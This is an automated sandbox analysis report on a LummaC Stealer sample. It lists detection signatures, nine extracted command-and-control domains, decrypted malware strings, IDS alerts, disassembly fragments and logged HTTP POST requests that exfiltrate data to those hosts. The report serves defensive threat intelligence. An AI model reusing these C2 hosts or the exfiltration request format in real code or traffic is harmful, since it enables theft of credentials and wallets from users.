Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1572085
MD5:	73f9c0001107eb1b3aab6549c6574f7f
SHA1:	92f5d81090d2cb7ff8be9764e7b69dca16ba44da
SHA256:	d1f439cd24726a4ed6001304ea33e413856a7242292f750088e66696bb5aecaa
Tags:	exeuser-Bitsight
Infos:

Detection

LummaC Stealer

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for sample

PE file contains section with special chars

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Checks for debuggers (devices)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Detected potential crypto function

Entry point lies outside standard sections

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 4208 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 73F9C0001107EB1B3AAB6549C6574F7F)

cleanup

Malware Configuration

Threatname: LummaC

{"C2 url": ["covery-mover.biz", "dwell-exclaim.biz", "zinc-sneark.biz", "formy-spill.biz", "impend-differ.biz", "se-blurry.biz", "atten-supporse.biz", "print-vexer.biz", "dare-curbys.biz"], "Build id": "LOGS11--LiveTraffic"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000003.2089970639.00000000016DF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2112827223.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2089565968.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2174142658.00000000016EA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2134348789.00000000016DB000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2111788836.00000000016DF000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2174167356.00000000016F8000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2134730644.00000000016DC000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000000.00000003.2171451535.00000000016DA000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 4208	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
Process Memory Space: file.exe PID: 4208	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 4208	JoeSecurity_LummaCStealer	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
Click to see the 8 entries

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T04:31:04.534618+0100	2028371	3	Unknown Traffic	192.168.2.5	49704	104.21.64.1	443	TCP
2024-12-10T04:31:06.665618+0100	2028371	3	Unknown Traffic	192.168.2.5	49705	104.21.64.1	443	TCP
2024-12-10T04:31:09.324616+0100	2028371	3	Unknown Traffic	192.168.2.5	49706	104.21.64.1	443	TCP
2024-12-10T04:31:11.574639+0100	2028371	3	Unknown Traffic	192.168.2.5	49707	104.21.64.1	443	TCP
2024-12-10T04:31:13.961991+0100	2028371	3	Unknown Traffic	192.168.2.5	49708	104.21.64.1	443	TCP
2024-12-10T04:31:17.776474+0100	2028371	3	Unknown Traffic	192.168.2.5	49709	104.21.64.1	443	TCP
2024-12-10T04:31:20.302083+0100	2028371	3	Unknown Traffic	192.168.2.5	49712	104.21.64.1	443	TCP
2024-12-10T04:31:26.956025+0100	2028371	3	Unknown Traffic	192.168.2.5	49722	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T04:31:05.270071+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49704	104.21.64.1	443	TCP
2024-12-10T04:31:07.691611+0100	2054653	1	A Network Trojan was detected	192.168.2.5	49705	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T04:31:05.270071+0100	2049836	1	A Network Trojan was detected	192.168.2.5	49704	104.21.64.1	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T04:31:07.691611+0100	2049812	1	A Network Trojan was detected	192.168.2.5	49705	104.21.64.1	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T04:31:04.534618+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49704	104.21.64.1	443	TCP
2024-12-10T04:31:06.665618+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49705	104.21.64.1	443	TCP
2024-12-10T04:31:09.324616+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49706	104.21.64.1	443	TCP
2024-12-10T04:31:11.574639+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49707	104.21.64.1	443	TCP
2024-12-10T04:31:13.961991+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49708	104.21.64.1	443	TCP
2024-12-10T04:31:17.776474+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49709	104.21.64.1	443	TCP
2024-12-10T04:31:20.302083+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49712	104.21.64.1	443	TCP
2024-12-10T04:31:26.956025+0100	2057922	1	Domain Observed Used for C2 Detected	192.168.2.5	49722	104.21.64.1	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T04:31:02.986386+0100	2057921	1	Domain Observed Used for C2 Detected	192.168.2.5	59033	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T04:31:18.528544+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.5	49709	104.21.64.1	443	TCP

ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-10T04:31:20.307997+0100	2843864	1	A Network Trojan was detected	192.168.2.5	49712	104.21.64.1	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: https://atten-supporse.biz/p	Avira URL Cloud: Label: malware
Source: https://atten-supporse.biz/&&	Avira URL Cloud: Label: malware

Found malware configuration

Source: file.exe.4208.0.memstrmin

Malware Configuration Extractor: LummaC {"C2 url": ["covery-mover.biz", "dwell-exclaim.biz", "zinc-sneark.biz", "formy-spill.biz", "impend-differ.biz", "se-blurry.biz", "atten-supporse.biz", "print-vexer.biz", "dare-curbys.biz"], "Build id": "LOGS11--LiveTraffic"}

Multi AV Scanner detection for submitted file

Source: file.exe

Virustotal: Detection: 50%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: impend-differ.biz
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: print-vexer.biz
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: dare-curbys.biz
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: covery-mover.biz
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: formy-spill.biz
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: dwell-exclaim.biz
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: zinc-sneark.biz
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: se-blurry.biz
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: atten-supporse.biz
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000003.2038007042.0000000005410000.00000004.00001000.00020000.00000000.sdmp	String decryptor: LOGS11--LiveTraffic

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00ED6B7E CryptUnprotectData,

0_2_00ED6B7E

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49704 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49707 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49709 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.64.1:443 -> 192.168.2.5:49712 version: TLS 1.2

Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+79314A46h]	0_2_00EE6170
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then push eax	0_2_00ECC36E
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+36A27D27h]	0_2_00EEC6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], al	0_2_00EEC6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]	0_2_00EEC6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+07540F19h]	0_2_00EEC6D7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+ebp*8], 299A4ECDh	0_2_00EFE690
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+05h]	0_2_00ECA960
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edx], bl	0_2_00ECCE55
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [edi+ebx+02h], 0000h	0_2_00EFDBD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 29DF508Eh	0_2_00EFDCF0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_00EC9CC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], dx	0_2_00ED7E82
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]	0_2_00EEBFDA
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-51BA460Ah]	0_2_00EEBFD3
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]	0_2_00EE5F7D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	0_2_00EEA060
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi+ebx], 00000000h	0_2_00ECC274
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, eax	0_2_00EE2270
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	0_2_00EF45F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp al, 2Eh	0_2_00EE66E7
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00EE86F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	0_2_00EEA630
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00EE0717
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_00EE0717
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00EE86F0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00EFCAC0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	0_2_00EEAAD0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+esi]	0_2_00EC2B70
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebp, word ptr [ecx+ebx*2]	0_2_00EF6B20
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00EFCCE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00EFCD60
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp word ptr [ebp+edx+02h], 0000h	0_2_00EDCEA5
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_00ED6E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, eax	0_2_00ED6E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [ebp-10h]	0_2_00EFCE00
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add ebx, 03h	0_2_00EE8F5D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ecx+edx*8], B430E561h	0_2_00ED4F08
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ecx, edx	0_2_00ED4F08
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_00EDD087
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_00EED085
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [esi], cl	0_2_00EED085
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ecx	0_2_00EDD074
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_00ED7190
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+1Ch]	0_2_00EE92D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edx, ebx	0_2_00EE92D0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov eax, dword ptr [00F04284h]	0_2_00EE5230
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00EEB3DE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [edi], bl	0_2_00EEB3DE
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ebx, bx	0_2_00EE536C
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [ecx], dx	0_2_00EE7307
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [ebx], al	0_2_00EEB4BB
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then jmp eax	0_2_00EEB475
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]	0_2_00EC7470
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx ecx, word ptr [edi+esi*4]	0_2_00EC7470
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx-41h]	0_2_00EE96D8
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+2Ch]	0_2_00EE7653
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_00ED597D
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [ebx+esi*8], B430E561h	0_2_00EE5920
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+eax-000000BCh]	0_2_00ED6E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov edi, eax	0_2_00ED6E97
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebx, eax	0_2_00EC5910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov ebp, eax	0_2_00EC5910
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov byte ptr [eax], cl	0_2_00ED5ADC
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], B430E561h	0_2_00ED9C10
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edi, byte ptr [esi+ecx-000000BCh]	0_2_00ED5EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then mov word ptr [eax], cx	0_2_00EE1EE0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then cmp dword ptr [edx+ecx*8], 2298EE00h	0_2_00EFDFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-0BF7BDDDh]	0_2_00EE5F7D

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2057921 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (atten-supporse .biz) : 192.168.2.5:59033 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49705 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49708 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49704 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49712 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49707 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49706 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49722 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2057922 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (atten-supporse .biz in TLS SNI) : 192.168.2.5:49709 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.5:49705 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.5:49709 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49704 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49704 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2843864 - Severity 1 - ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M2 : 192.168.2.5:49712 -> 104.21.64.1:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: covery-mover.biz
Source: Malware configuration extractor	URLs: dwell-exclaim.biz
Source: Malware configuration extractor	URLs: zinc-sneark.biz
Source: Malware configuration extractor	URLs: formy-spill.biz
Source: Malware configuration extractor	URLs: impend-differ.biz
Source: Malware configuration extractor	URLs: se-blurry.biz
Source: Malware configuration extractor	URLs: atten-supporse.biz
Source: Malware configuration extractor	URLs: print-vexer.biz
Source: Malware configuration extractor	URLs: dare-curbys.biz

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49708 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49704 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49712 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49707 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49722 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 104.21.64.1:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49709 -> 104.21.64.1:443

Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 53Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=P5UVSGGAUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 12781Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=42NE97KCA7D9W9VPUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 15071Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2782DAONUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 20513Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=2OCJPJZOUOH8LKT56AUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 1250Host: atten-supporse.biz
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: multipart/form-data; boundary=ESTOMURCU456190DQ8User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 584637Host: atten-supporse.biz

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: atten-supporse.biz

Source: unknown

HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: atten-supporse.biz

Source: file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: file.exe, 00000000.00000003.2272354307.00000000016C9000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.micro
Source: file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2135008741.0000000005F18000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
